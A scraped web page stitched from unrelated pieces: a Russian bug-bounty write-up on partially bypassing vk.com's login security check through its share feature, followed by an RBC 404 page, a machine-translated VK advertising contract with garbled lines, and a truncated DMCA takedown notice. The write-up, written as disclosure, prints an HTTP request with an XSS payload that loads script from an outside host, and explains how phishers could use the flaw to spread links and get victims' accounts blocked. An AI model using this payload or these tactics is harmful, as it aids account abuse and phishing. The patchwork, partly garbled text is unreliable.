Регистрация vk com: VK Calls: the app for group video calls

[BugBounty] Частичный обход аутентификации vk.com / Хабр

Поставил перед собой задачу — обойти аутентификацию Вконтакте. Когда ip адрес человека, который входит на аккаунт vk меняется, нужно ввести полный номер телефона. Если злоумышленник входил через телефон; пароль, то он сможет совершать действия на аккаунте. Но если он входил через email; пароль или через подмену cookies, то он не сможет совершать какие либо действия на аккаунте.

Вся информация предоставлена исключительно в ознакомительных целях. Я не несу ответственности за любой возможный вред, причиненный материалами этой статьи.
Брутфорсинг здесь работать не будет, так как у нас всего 3 попытки ввести номер телефона. Пытался выполнять все возможные get и post запросы, но все время происходил редирект на https://vk.com/login.php?act=security_check.

Можно было бы выполнить post запрос из другого аккаунта, для этого нам нужен csrf token(hash), но я смог найти только токен для логаута https://login. vk.com/?act=logout&hash=dbefb8b0bba973b95e&reason=tn&_origin=https://vk.com.

Нам предлагают изменить номер телефона на аккаунте vk.com/restore?act=change_phone, здесь можем видеть количество непрочитанных сообщений (не баг, а фича, но убрать это не мешало бы) и настройки пунктов меню.

Чуть позже, случайно я наткнулся на функционал шаринга ссылки https://vk.com/share.php?url=https://ok.ru, на мое удивление, эта ссылка открылась:

Попытался запостить себе ссылку на стенку и получил сообщение.

Поздравляем!

Ссылка появится на Вашей странице.

Сначала не поверил, подумал, что security_check заблокировал всё, но зашел на стенку и увидел, что ссылка успешно запостилась )

На стену можно расшаривать не только ссылки, а и обычный пост, для этого нужно оставить параметр url пустым https://vk. com/share.php?url=.

Также, если мы владелец или администратор сообщества, мы можем запостить на стену сообщества запись в обход ввода номера телефона.

Друзьям мы не можем отправить сообщение, так как vk.com/login.php?act=security_check блокирует получение списка друзей. Запрос отправки url другу имеет вид.

POST /al_mail.php HTTP/1.1
Host: vk.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://vk.com/share.php?url="><script src=https://securityz.net/t.js?320408></script></script>
Content-Length: 139
Cookie: remixlang=0
Connection: close
act=a_send&al=1&chas=89c444076031dff154&from=share&media=share%3A0_0&message=ww&share_desc=&share_title=&share_url=&title=&to_ids=204690***

Где to_ids — иды друзей, chas — csrf токен, значит, мы не можем просто подставить ид друга, токен нам мешает. С запроса шаринга ссылки на стену токен мы взять не можем, так там совсем другая переменная — hash=bb6e1ce8db5f1419e3.

Сразу после обнаружения уязвимости я написал репорт на h2, мне сказали, что это дубликат, ранее уже присылали такой репорт.

Чтобы узнать примерную дату, когда прислали репорт, я обращаюсь к поиску по репортам, смотрю репорт, ид которого наиболее близок к моему и смотрю дату — hackerone.com/reports/170894. Оказалось, репорт этот прислали 4 месяца назад.

Очень печально, что vk за это время не смогли исправить уязвимость. Некоторые репорты висят годами, уверен, что много баг хантеров в bug bounty vk наткнулись на дубликаты, так как ни для кого не секрет, что у ВК много репортов и много работы, а безопасников очень мало.

Пруф — уязвимость в видео файлах, которую прислал Алексей Писаренко. Ожидает устранения уже 2 года!

Ещё один репорт, который висит уже

1 год:

Эта статья создана только для того, чтобы привлечь внимание разработчиков Вконтакте, надеюсь, они исправят данную уязвимость, увеличат штат безопасников и начнут оперативно устранять уязвимости.

Выводы: Цель фишеров — спамить, она остается выполнимой, аутентификацию можно забайпасить.

P.S: В процессе обхода аутентификации обнаружил уязвимость, которая позволяет подписаться на любую групу vk, не зная номера телефона жертвы, и ещё одну, с помощью которой можно полностью обойти ввод номера, но пока об этом не написал репорт.

P.P.S: Об импакте уязвимости:

1. Эта уязвимость может использоваться при массовых фишинговых атаках на пользователей (сейчас набирает популярность создание фейков ВК и распространение их через личные сообщения, а также соц инженерия, применимая на друзьях взломанных аккаунтов), часто фишеры при получении логов сталкиваются с проблемой входа в аккаунт и дальнейшего распространения url фишингового сайта (получают только email;password), с этой уязвимостью они могут получать намного больше логов за счет того, что делятся своей ссылкой на стене и в группе жертвы.

2. Чтобы заблокировать или заморозить страницу пользователя — нужно поделится запрещенной ссылкой у себя на стене и аккаунт сразу заблокируют.

Группа VK и мой твиттер внизу. Буду очень рад подписке 🙂

Рекомендую прочитать мою предыдущую статью «Iframe injection и self xss на более чем 20 000 сайтах alexarank UA/RU». И следующую статью [Багхантинг] Blind XSS уязвимость на сайтах службы поддержки omnidesk .

Новости дня в России и мире — РБК

Телеканал

Pro

Инвестиции

Мероприятия

РБК+

Новая экономика

Тренды

Недвижимость

Спорт

Стиль

Национальные проекты

Город

Крипто

Дискуссионный клуб

Исследования

Кредитные рейтинги

Франшизы

Газета

Спецпроекты СПб

Конференции СПб

Спецпроекты

Проверка контрагентов

РБК Библиотека

Подкасты

ESG-индекс

Политика

Экономика

Бизнес

Технологии и медиа

Финансы

РБК КомпанииРБК Life

404

Cтраницa не найдена

Посмотрите другие материалы или воспользуйтесь поиском

S7 раскрыла метод «раскатки» новых рейсов с помощью бразильских самолетов

Эрдоган победил во втором туре выборов президента Турции

Слова сенатора США о «смерти русских» оказались вырванными из контекста

Британия сочла себя самой уязвимой в случае войны субсидий США и Китая

Аборты, оружие, экология: в чем инвесторы-активисты обвиняют компании США

Мечеть в дыму, песня Эрдогана: как прошел второй тур выборов в Турции

Власти решили продлить временный порядок для перевозки грузов по сети РЖД

Зеленский сообщил об одной из крупнейших атак дронов на Украину

Аналитики заявили, что Россия сбила почти все дроны Bayraktar на Украине

Вучич предупредил о риске появления «еще одного Зеленского»

Эксперты объяснили отказ Норвегии дать убежище экс-командиру «Вагнера»

Как Китай обгоняет Россию в торговле в Центральной Азии. Инфографика

Как выглядят протесты в Сербии, где требуют отставки Вучича. Фотогалерея

Военная операция на Украине. Онлайн

Экономика Германии в рецессии. Что это значит для еврозоны и ставок ЕЦБ

Почему люди зря боятся личного банкротства. Развеиваем 12 страхов

Вернуться на главную

myMail, myChat, myGames, myCamera. Управляйте электронной почтой, общайтесь с друзьями, открывайте для себя новые увлекательные игры и редактируйте свои фотографии

Юридическая документация Социальные сети ПРЕДЛОЖЕНИЕ НА УСЛУГИ ПО РАЗМЕЩЕНИЮ РЕКЛАМЫ (vk.com)

ПРЕДЛОЖЕНИЕ НА УСЛУГИ ПО РАЗМЕЩЕНИЮ РЕКЛАМЫ (vk.com)

Настоящий документ, именуемый в дальнейшем «Оферта», устанавливает правоотношения между MGL MY.COM (CYPRUS) LIMITED ( регистрационный номер: HE 367552) с зарегистрированным офисом по адресу: 28 Oktovriou, 365 VASHIOTIS SEAFRONT, office 402 Neapoli, 3107, Limassol, Cyprus, именуемый в дальнейшем «Заказчик»,

и лицо, именуемое в дальнейшем «Исполнитель», надлежащим образом приняло условия настоящей Оферты.

1.  Акцептуя условия настоящей Оферты, Исполнитель заключает договор (далее – « С договор») на оказание Услуг по размещению рекламы в рамках Заявки путем демонстрации Размещение рекламы Пользователям Социальной сети через интерфейс сайта, именуемое в дальнейшем «Сервисы»

1.1. Условием присоединения к настоящей Оферте является выполнение Провайдером следующих действий:

— Провайдер присоединился к Оферте для привлечения пользователей на сайты по адресу http://legal.my.com/us/social/offer/;

 — Переход Провайдера по ссылке на http://reg.my.com и заполнению регистрационной формы. После заполнения всех обязательных полей регистрационной формы и нажатия кнопки «Создать» (или аналогичной) Оферта считается принятой Провайдером.

— Программное подключение к программно-аппаратному комплексу Социальной сети.

— Провайдер использует уникальный логин и пароль для доступа в личный кабинет, полученный Провайдером при регистрации или иным образом установленный в Правилах к Оферте для привлечения пользователей на сайты (далее – «Правила»).

— Провайдер гарантирует, что программное обеспечение, к которому он создает доступ, и информационный контент не противоречат действующему законодательству, в частности, не нарушают авторские и смежные права третьих лиц, права интеллектуальной собственности, неприкосновенность частной жизни, честь, деловую репутацию, соответствовать нормам морали и этики, а также Правилам.

1.2. Заказчик вправе в одностороннем порядке изменять условия Оферты путем размещения новой редакции на Сайтах или внесения изменений. Изменения вступают в силу с момента размещения измененного текста на Сайте по адресу: https://legal.my.com/us/social/offer_ad_vkcom;

Провайдер обязуется регулярно знакомиться с новыми редакциями и следить за Предложениями новых редакций.

1.3. Исполнитель вправе не согласиться с новыми условиями заключения Оферты, направив Заказчику письменное уведомление (отказ) в течение 3 (трех) дней с момента публикации изменений на Сайте. Неполучение от Исполнителя письменного уведомления (отказа), а также любое исполнение Оферты после вступления изменений в силу считается согласием Исполнителя с новыми условиями и заключением Оферты на новых условиях. .

Термины и определения:

Социальная сеть (Сайт) — многофункциональный сайт, расположенный по адресу https://vk.com, предназначенный для интерактивного общения Пользователей и использующий определенные возможности программы, в том числе интерактивные игры, ВКонтакте. мини-приложения, а также мобильные версии указанного веб-сайта и официальные приложения для телефонов и компьютерных устройств, распространяемые через другие платформы распространения.

Пользователь  – физическое лицо, зарегистрировавшееся в Социальной сети и авторизовавшееся с помощью личного кабинета в Социальной сети, осуществляющее доступ к Приложению, размещенному в Социальной сети, и его использование.

Приложение — программное обеспечение/интерактивный сервис Провайдера, размещенный в социальной сети (правообладателем которого является Провайдер, прошедший процедуру соответствующей регистрации на Сайте), в том числе интерактивная игра, приложение ВК мини , за исключением программных продуктов Исполнителя, с помощью которых осуществляется дистанционная продажа товаров, услуг или прав на результаты интеллектуальной деятельности.

Мобильный клиент  Социальной сети — приложения Социальных сетей для мобильных устройств, размещенных на Мобильных платформах, а также версия сайта Социальной сети для Мобильных платформ.

Мобильная платформа  обозначает платформы, позволяющие владельцам мобильных устройств приобретать и устанавливать Приложения для своих мобильных устройств. Для целей Договора Стороны признают App Store, Google Play в качестве Мобильных платформ.

API  (далее «Интерфейс прикладных программ» или «Интерфейс») — совокупность правил и соглашений, касающихся форматов вызовов и процедур, определяющих порядок взаимодействия программных продуктов.

Отчетный период  – один (1) календарный месяц, если не указано иное.

Аккаунт  – регистрационная запись, сделанная Поставщиком на Веб-сайте и содержащая информацию о Поставщике. Доступ к Учетной записи осуществляется через Личный кабинет.

Личный кабинет — приватная зона Сайта, позволяющая перемещаться в рамках информационного пространства, выделенного Провайдеру, с целью ознакомления со Статистическими данными. Для входа в Личный кабинет используются уникальные логин и пароль, полученные Провайдером при регистрации на Сайте.

Данные статистики — данные о количестве сеансов показа Рекламы Пользователям Сайта в Отчетном периоде, сформированные Заказчиком по результатам автоматизированной обработки и доступные Исполнителю в Личном кабинете для изучение.

Реклама  – информация, распространяемая Провайдером в Приложении, адресованная неопределенному кругу лиц и направленная на привлечение внимания к объекту рекламы, формирование или поддержание интереса к нему и продвижение его на рынке.

Межстраничная  – вид Рекламы, демонстрируемый Пользователям в Приложениях для WEB-платформы, в том числе в мобильных WEB-приложениях, в промежутках между внутриигровыми событиями Приложения.

Native Interstitial  — вид Рекламы, демонстрируемый Пользователям Android-приложений в промежутках между внутриигровыми событиями Приложения.

Вознагражденная Реклама  — вид Рекламы, демонстрируемый Пользователям в Приложениях для WEB-платформы, в том числе мобильных WEB-приложениях, за последующее вознаграждение таким Пользователям.

Native Rewarded означает тип Рекламы, демонстрируемый Пользователям Android-приложений для последующего вознаграждения таким Пользователям.

Нативные баннеры — вид рекламы, демонстрируемый Пользователям приложений Android или iOS в виде баннера.

2. Заказчик уплачивает Исполнителю вознаграждение за оказанные услуги в размере и в порядке, установленных настоящим Договором.

3. Объявление для размещения в Приложении подается Заказчиком через API по запросу Исполнителя. Заказчик самостоятельно осуществляет все расчеты с рекламодателями. В случае предъявления претензий третьих лиц в отношении размещения Рекламы, Заказчик самостоятельно и за свой счет урегулирует претензии.

4. Провайдер самостоятельно определяет тип Объявления через API. Провайдер не использует сторонние системы монетизации рекламы (баннерные и тизерные сети, CPA-системы и др.) и сторонние системы отображения медийной рекламы.

5. Заказчик вправе отказаться от размещения Объявления в Заявке Исполнителя без объяснения причин.

6. Стоимость Услуг Исполнителя по Размещению Рекламы в Приложении определяется в зависимости от количества сеансов демонстрации Пользователям исходя из стоимости 1000 (тысячи) сеансов демонстрации, равной:

• для размещения межстраничных объявлений – 50 (пятьдесят) рублей,
• для размещения нативных межстраничных объявлений – 80 (восемьдесят) рублей,
• для размещения вознагражденной рекламы – 60 (шестьдесят) рублей,
• для размещения нативной рекламы – 90 (девяносто) рублей,
• за размещение Нативного баннера – 10 (десять) рублей,

и включает все применимые налоги, включая, но не ограничиваясь, НДС, налог с продаж и использование и т. д.

7. Один раз в месяц Стороны рассчитывают вознаграждение Исполнителя исключительно на основании только Статистических данных Заказчика, в срок не более 5 (пяти) рабочих дней с даты окончания Отчетного периода, при этом уплата вознаграждения производится в срок, не превышающий 45 (сорок пять) календарных дней с даты окончания соответствующего Отчетного периода на основании справки, предоставленной в соответствии с пунктом 10 настоящего Положения. Кроме того, Стороны договорились о том, что вознаграждение Исполнителю не выплачивается, если его размер в соответствующем Отчетном периоде составляет менее 10 000 (Десяти тысяч) рублей Российской Федерации. В этом случае вознаграждение выплачивается Исполнителю по окончании Отчетного периода, в котором его размер превышает 10 000 (Десять тысяч) рублей, либо при расторжении/истечении срока действия настоящего Договора.

8. Расчет и уплата вознаграждения Исполнителю производится по итогам каждого Отчетного периода на основании Статистических данных Заказчика. Исполнитель вправе самостоятельно определять размер вознаграждения Исполнителя, подлежащего уплате за Отчетный период в пределах стоимости оказанных услуг, определяемой на основании Статистических данных Заказчика, если размер вознаграждения составляет 10 000 (Десять тысяч) и более рублей Российской Федерации.

9. В случае выявления Заказчиком фактов мошенничества при показе Рекламы, в том числе, но не ограничиваясь автоматическим увеличением просмотров рекламы без или с использованием ботов, Заказчик вправе исправить Данные статистики Заказчика и учесть их при расчете вознаграждения Провайдера. Кроме того, Заказчик вправе заблокировать Аккаунт Провайдера, а также полностью и частично отключить/заблокировать/удалить Приложение(я) Провайдера, размещенное в Социальной сети, либо отказаться от размещения Рекламы в Приложении.

10. Исполнитель не позднее 5 (пяти) рабочих дней с даты истечения Отчетного периода/получения Статистических данных Заказчика за соответствующий Отчетный период направляет справку по форме, приведенной в Приложении №. 1 к настоящему Договору и счет-фактура.

11. Акт и счет-фактура, оформленные на основании Статистических данных, предоставляются Заказчику в электронном сканированном виде с подписью и печатью уполномоченного представителя Исполнителя и являются основанием для проведения расчетов. Электронные документы отправляются Провайдером с использованием программного обеспечения Заказчика.

12. Оплата услуг Исполнителя производится в российских рублях. Клиент считается исполнившим свое обязательство по оплате с момента списания денежных средств с его расчетного счета. Каждая Сторона самостоятельно рассчитывает и уплачивает все применимые налоги в соответствии с законодательством государства, резидентом которого она является. Заказчик включает в счет, а Поставщик ссылается на конкретные инструкции и информацию в отношении налогов и курсов обмена валют, используемых для расчета сборов и/или применимых налогов в ЕС, и/или любые аналогичные руководства и положения в отношении налогов и обмена валюты. расчет ставок.

13. Настоящий Договор вступает в силу в течение 1 (одного) года с момента Акцепта Оферты. В случае, если ни одна из Сторон не заявит о расторжении Договора за 30 (тридцать) календарных дней до истечения срока его действия, он автоматически продлевается на каждый последующий год.

14. Настоящий Договор может быть расторгнут по письменному соглашению Сторон или иным образом в соответствии с применимым законодательством и условиями настоящего Договора.

15. Исполнитель имеет право в одностороннем порядке расторгнуть настоящий Контракт при условии письменного уведомления Заказчика за тридцать (30) рабочих дней до предполагаемой даты расторжения.

16. Заказчик вправе в одностороннем порядке расторгнуть настоящий Договор, если письменное уведомление о расторжении будет направлено на адрес, указанный Исполнителем в процессе регистрации.

17. Недействительность любого из положений настоящего Договора не влечет недействительности Договора в целом. Если какое-либо положение настоящего Контракта является или становится незаконным или неисполнимым, это положение должно быть приведено в исполнение в максимально допустимой степени и/или изменено для максимально близкого достижения эффекта первоначального условия, а остальные положения настоящего Контракта остаются в силе. Полная сила и эффект.

18. Настоящий Договор остается в силе в случае изменения реквизитов Сторон, внесения изменений в его учредительные документы, изменения организационно-правовой формы, собственности одной или обеих Сторон.

19. В случае изменения реквизитов Исполнителя, указанных в настоящем Договоре, Исполнитель информирует об этом Заказчика в течение 3 (трех) рабочих дней.

20. Настоящий Контракт, его заключение и исполнение должны толковаться и регулироваться законами Англии и Уэльса. Любой спор, возникающий из настоящего Договора или в связи с ним, включая любые вопросы, касающиеся его существования, действительности или прекращения, должен быть передан и окончательно разрешен арбитражем в соответствии с Правилами LCIA, которые считаются включенными посредством ссылки в настоящий пункт. Количество арбитров – один. Местонахождением или юридическим местом арбитража является Лондон, Великобритания. Языком, используемым в арбитражном разбирательстве, является английский.

21. Настоящая Оферта вступает в силу с 1 июля 2022 года. Договор вступает в силу с момента его акцепта Исполнителем на условиях, изложенных в разделе 1 настоящего Договора.

22. Заказчик оставляет за собой право пересматривать условия настоящего Договора, обновляя условия Договора на https://legal.my.com/us/social/offer_ad_vkcom или уведомляя Исполнителя по электронной почте. Пересмотренный Контракт вступает в силу с даты его опубликования. Поставщику рекомендуется периодически проверять указанный выше веб-сайт на наличие уведомлений о таких изменениях. Несовершение Провайдером действий по ознакомлению не может быть основанием для неисполнения Провайдером своих обязательств и несоблюдения Провайдером ограничений, установленных настоящим Договором.

23. В случае, если Исполнителя не устраивает изменение Контракта, Исполнитель может расторгнуть Контракт в течение 3 (трех) дней с даты публикации измененного Контракта, письменно уведомив об этом Заказчика. Отсутствие такого уведомления или продолжение выполнения Поставщиком условий Контракта считается принятием любых пересмотренных условий.

24. Заказчик вправе без согласия Исполнителя передать, новировать и/или переуступить любые свои права и обязанности по настоящей Оферте, в том числе право требования оплаты, а также делегировать их третьим лицам с письменным уведомлением Исполнителя. Исполнитель не вправе передавать, новировать или переуступать какие-либо свои права и обязанности по настоящей Оферте, а также делегировать их третьим лицам без согласия Заказчика.

01.07.2022

Приложение № 1
к Оферте на оказание услуг по размещению рекламы

(редакция от 01.07.2022)

[FO РМ]

Сертификат на оказанные услуги

Справка за Отчетный период: ___________ 20__г.

№	Название приложения, APP_ID	Количество показов Rewarded Ads в приложении	Количество показов межстраничной рекламы в приложении	Количество показов нативной рекламы с вознаграждением в приложении	Количество показов нативной межстраничной рекламы в приложении 9 0193	Количество нативных баннеров показов в Заявке	Вознаграждение Провайдера за Отчетный период
1

Итого: ________________________________________________ Русский Ru благословит.

Статистические данные за ___________ 20__г.

Поставщик:

_________________________________________________

__________________ / ______________________ /

DMCA (Авторское право) Жалоба в Google :: Уведомления :: Lumen

отправитель

Ограниченное удаление конфиденциальности

от имени Джеймс Макси

[Частный] ГБ Отправлено 15 марта 2023 г. СТРАНА: Великобритания 🇷🇺

получатель

ООО «Гугл»

[Частный] Маунтин-Вью, Калифорния, 94043, США

отправитель

ООО «Гугл»

Google officially changed from Google Inc. to Google LLC in 2017, and as of August, 2022, all Google submissions are marked as from Google, LLC.»/>

основной

Джеймс Макси

Другие организации:

• Директор

Тип уведомления:

Закон о защите авторских прав в цифровую эпоху

1. Заявление об авторских правах 1

   Вид работы: не указан

   Описание Я уполномочен действовать от имени оригинального создателя/владельца Jamesmaxyy авторских прав на эти фото/видео. Они работают в индустрии развлечений для взрослых под псевдонимом Jamesmaxyy, используя веб-сайт Onlyfans, чтобы делиться своим личным записанным контентом. https://onlyfans.com/jamesmaxyy https://onlyfans.com/jamesmaxyfree https://twitter.com/Jamesmaxyy https://www.instagram. com/james.maxyy/

   Исходные URL:
   1. onlyfans.com — 2 URL
   2. www.instagram.com — 1 URL
   3. twitter.com – 1 URL
   Предположительно нарушающие авторские права URL:
   1. forum.gayforfans.com — 43 URL
   2. twitter.com — 6 URL-адресов
   3. peepeebabes.club — 6 URL
   4. thebussybandit.com — 5 URL
   5. pbs.twimg.com — 5 URL
   6. xvidgay.xyz — 2 URL-адреса
   7. trahkino.cc — 2 URL
   8. onesiterip.com — 2 URL
   9. i.mycdn.me — 2 URL-адреса
   10. filesmonster.com — 2 URL-адреса
   11. exporntoons.net — 2 URL
   12. www.pornteen123.com — 2 URL
   13. ukdevilz.com — 1 URL
   14. mat6tube.com — 1 URL
   15. m.vk.com — 1 URL
   16. justthegays.